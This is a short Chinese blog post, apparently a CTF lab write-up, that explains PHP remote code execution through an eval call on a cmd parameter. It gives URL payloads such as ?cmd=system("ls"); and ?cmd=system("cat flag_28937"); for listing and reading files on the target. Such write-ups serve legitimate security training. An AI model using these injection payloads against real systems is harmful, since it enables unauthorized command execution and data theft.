WEB--代码执行

远程代码执行(Remote Code Execution,简称RCE)‌

是一种攻击方式,其中攻击者通过远程调用的方式在目标计算机设备上执行恶意代码,从而控制该设备。这种攻击通常发生在攻击者利用远程执行代码漏洞,使得恶意程序得以在受影响的系统上运行,进而控制整个系统。

及以下需了解到的函数有:   isset()、eval()、phpinfo()、system()

一、PHP isset() 函数

二、PHP eval() 函数

三、PHPINFO() 函数

四、SYSTEM() 函数

更多php函数请参考:https://www.runoob.com/php/php-functions.html

 

 

 

 

代码执行--eval函数调用

打开网址就得到源码,发现eval函数调用cmd,

据此,尝试在url后输入

?cmd=system("ls");

 

接下来就是考验你对系统命令的了解程度了。编辑命令查找flag文件   注:../    是返回上一层目录

 

发现flag文件,使用cat命令查看文件内容

?cmd=system("cat flag_28937");                          即可查看flag

 

或者可以直接使用phpinfo()。然后在使用ctrl+g打法去搜ctfhub           不过可能因为作者并没有把flag文件放入www根目录,所以我也找不到,还是使用system()系统函数去找吧

?cmd=phpinfo();

 

 

posted @ 2024-09-29 19:22  梧先生、  阅读(26)  评论(0)    收藏  举报